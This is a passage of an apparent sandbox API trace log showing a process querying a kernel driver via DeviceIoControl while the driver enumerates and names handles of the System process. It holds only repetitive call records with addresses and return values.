DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.821] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.821] PsAcquireProcessExitSynchronization () returned 0x0 [0116.821] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.821] ObReferenceObjectByHandle (in: Handle=0xffffffff8000010c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8008bc2f20, HandleInformation=0x0) returned 0x0 [0116.821] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.821] PsReleaseProcessExitSynchronization () returned 0x2 [0116.821] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.821] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002809044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002809044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.821] ObfDereferenceObject (Object=0xfffffa8008bc2f20) returned 0x1 [0116.821] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.821] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.821] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.821] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.821] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.821] PsAcquireProcessExitSynchronization () returned 0x0 [0116.821] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.821] ObReferenceObjectByHandle (in: Handle=0xffffffff80000110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8007bfdf20, HandleInformation=0x0) returned 0x0 [0116.821] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.821] PsReleaseProcessExitSynchronization () returned 0x2 [0116.821] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.821] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800280a044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800280a044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.821] ObfDereferenceObject (Object=0xfffffa8007bfdf20) returned 0x1 [0116.822] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.822] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.822] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.822] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.822] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.822] PsAcquireProcessExitSynchronization () returned 0x0 [0116.822] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.822] ObReferenceObjectByHandle (in: Handle=0xffffffff80000114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8007bfd050, HandleInformation=0x0) returned 0x0 [0116.822] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.822] PsReleaseProcessExitSynchronization () returned 0x2 [0116.822] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.822] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800280b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800280b044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.822] ObfDereferenceObject (Object=0xfffffa8007bfd050) returned 0x1 [0116.822] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.822] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.822] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.822] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.822] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.822] PsAcquireProcessExitSynchronization () returned 0x0 [0116.822] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.823] ObReferenceObjectByHandle (in: Handle=0xffffffff80000118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8008fff050, HandleInformation=0x0) returned 0x0 [0116.823] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.823] PsReleaseProcessExitSynchronization () returned 0x2 [0116.823] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.823] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800280c044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800280c044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.823] ObfDereferenceObject (Object=0xfffffa8008fff050) returned 0x1 [0116.823] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.823] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.823] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.823] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0116.823] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.823] PsAcquireProcessExitSynchronization () returned 0x0 [0116.823] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.823] ObReferenceObjectByHandle (in: Handle=0xffffffff80000130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003435f20, HandleInformation=0x0) returned 0x0 [0116.823] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.823] PsReleaseProcessExitSynchronization () returned 0x2 [0116.823] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.823] ObQueryNameString (in: Object=0xfffffa8003435f20, ObjectNameInfo=0xfffffa800280e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800280e044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.824] ObfDereferenceObject (Object=0xfffffa8003435f20) returned 0x1 [0116.824] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.824] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.824] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.824] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0116.824] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.824] PsAcquireProcessExitSynchronization () returned 0x0 [0116.824] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.824] ObReferenceObjectByHandle (in: Handle=0xffffffff80000134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002ebbdd0, HandleInformation=0x0) returned 0x0 [0116.824] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.824] PsReleaseProcessExitSynchronization () returned 0x2 [0116.824] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.824] ObQueryNameString (in: Object=0xfffffa8002ebbdd0, ObjectNameInfo=0xfffffa8002816044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002816044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.824] ObfDereferenceObject (Object=0xfffffa8002ebbdd0) returned 0x2 [0116.824] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.824] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.824] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.824] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x4a, lpOverlapped=0x0) returned 1 [0116.824] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.825] PsAcquireProcessExitSynchronization () returned 0x0 [0116.825] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.825] ObReferenceObjectByHandle (in: Handle=0xffffffff80000138, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002ebcc10, HandleInformation=0x0) returned 0x0 [0116.825] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.825] PsReleaseProcessExitSynchronization () returned 0x2 [0116.825] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.825] ObQueryNameString (in: Object=0xfffffa8002ebcc10, ObjectNameInfo=0xfffffa800281a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281a044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.825] ObfDereferenceObject (Object=0xfffffa8002ebcc10) returned 0x1 [0116.825] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.825] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.825] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.825] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0116.825] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.825] PsAcquireProcessExitSynchronization () returned 0x0 [0116.825] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.825] ObReferenceObjectByHandle (in: Handle=0xffffffff80000140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002ebbf20, HandleInformation=0x0) returned 0x0 [0116.825] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.825] PsReleaseProcessExitSynchronization () returned 0x2 [0116.826] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.826] ObQueryNameString (in: Object=0xfffffa8002ebbf20, ObjectNameInfo=0xfffffa800281b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281b044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.826] ObfDereferenceObject (Object=0xfffffa8002ebbf20) returned 0x1 [0116.826] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.826] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.826] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.826] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0116.826] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0117.959] PsAcquireProcessExitSynchronization () returned 0x0 [0117.959] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0117.959] ObReferenceObjectByHandle (in: Handle=0xffffffff80000158, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80055f67f0, HandleInformation=0x0) returned 0x0 [0117.959] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0117.959] PsReleaseProcessExitSynchronization () returned 0x2 [0117.959] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0117.959] ObQueryNameString (in: Object=0xfffffa80055f67f0, ObjectNameInfo=0xfffffa800281c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281c044, ReturnLength=0xfffff88005163550) returned 0x0 [0117.959] ObfDereferenceObject (Object=0xfffffa80055f67f0) returned 0x1 [0117.959] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0117.959] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0117.959] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0117.959] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x98, lpOverlapped=0x0) returned 1 [0117.960] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0117.960] PsAcquireProcessExitSynchronization () returned 0x0 [0117.960] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0117.960] ObReferenceObjectByHandle (in: Handle=0xffffffff8000015c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003884050, HandleInformation=0x0) returned 0x0 [0117.960] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0117.960] PsReleaseProcessExitSynchronization () returned 0x2 [0117.960] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0117.960] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800283d044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800283d044, ReturnLength=0xfffff88005163508) returned 0x0 [0117.960] ObfDereferenceObject (Object=0xfffffa8003884050) returned 0x1 [0117.960] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0117.960] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0117.960] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0117.960] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0117.960] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0117.960] PsAcquireProcessExitSynchronization () returned 0x0 [0117.960] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0117.960] ObReferenceObjectByHandle (in: Handle=0xffffffff80000160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002ad4dc0, HandleInformation=0x0) returned 0x0 [0117.960] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0117.960] PsReleaseProcessExitSynchronization () returned 0x2 [0117.960] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0117.960] ObQueryNameString (in: Object=0xfffffa8002ad4dc0, ObjectNameInfo=0xfffffa800255c504, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800255c504, ReturnLength=0xfffff88005163550) returned 0x0 [0117.961] ObfDereferenceObject (Object=0xfffffa8002ad4dc0) returned 0x1 [0117.961] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0117.961] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0117.961] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0117.961] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0117.961] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0117.961] PsAcquireProcessExitSynchronization () returned 0x0 [0117.961] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0117.961] ObReferenceObjectByHandle (in: Handle=0xffffffff80000170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a28de0, HandleInformation=0x0) returned 0x0 [0117.961] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0117.961] PsReleaseProcessExitSynchronization () returned 0x2 [0117.961] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0117.961] ObQueryNameString (in: Object=0xfffffa8003a28de0, ObjectNameInfo=0xfffffa80027e2584, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027e2584, ReturnLength=0xfffff88005163550) returned 0x0 [0117.961] ObfDereferenceObject (Object=0xfffffa8003a28de0) returned 0x2 [0117.961] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0117.961] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0117.980] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0117.981] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0117.981] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0117.981] PsAcquireProcessExitSynchronization () returned 0x0 [0117.981] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0117.981] ObReferenceObjectByHandle (in: Handle=0xffffffff80000178, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002ebc970, HandleInformation=0x0) returned 0x0 [0117.981] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0117.981] PsReleaseProcessExitSynchronization () returned 0x2 [0117.981] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0117.981] ObQueryNameString (in: Object=0xfffffa8002ebc970, ObjectNameInfo=0xfffffa800280a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800280a044, ReturnLength=0xfffff88005163550) returned 0x0 [0117.981] ObfDereferenceObject (Object=0xfffffa8002ebc970) returned 0x1 [0117.981] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0117.981] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0117.981] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0117.981] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xa8, lpOverlapped=0x0) returned 1 [0117.981] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0117.981] PsAcquireProcessExitSynchronization () returned 0x0 [0117.981] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0117.981] ObReferenceObjectByHandle (in: Handle=0xffffffff80000180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003404760, HandleInformation=0x0) returned 0x0 [0117.981] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0117.982] PsReleaseProcessExitSynchronization () returned 0x2 [0117.982] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0117.982] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002816044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002816044, ReturnLength=0xfffff88005163508) returned 0x0 [0117.982] ObfDereferenceObject (Object=0xfffffa8003404760) returned 0x21 [0117.982] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0117.982] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0117.982] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0117.982] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0117.982] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0117.982] PsAcquireProcessExitSynchronization () returned 0x0 [0117.982] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0117.982] ObReferenceObjectByHandle (in: Handle=0xffffffff80000184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80033ec2c0, HandleInformation=0x0) returned 0x0 [0117.982] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0117.982] PsReleaseProcessExitSynchronization () returned 0x2 [0117.982] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0117.982] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002483044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002483044, ReturnLength=0xfffff88005163508) returned 0x0 [0117.982] ObfDereferenceObject (Object=0xfffffa80033ec2c0) returned 0x1 [0117.982] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0117.982] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0117.982] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0117.982] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0117.982] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0117.982] PsAcquireProcessExitSynchronization () returned 0x0 [0117.982] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0117.983] ObReferenceObjectByHandle (in: Handle=0xffffffff8000019c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, 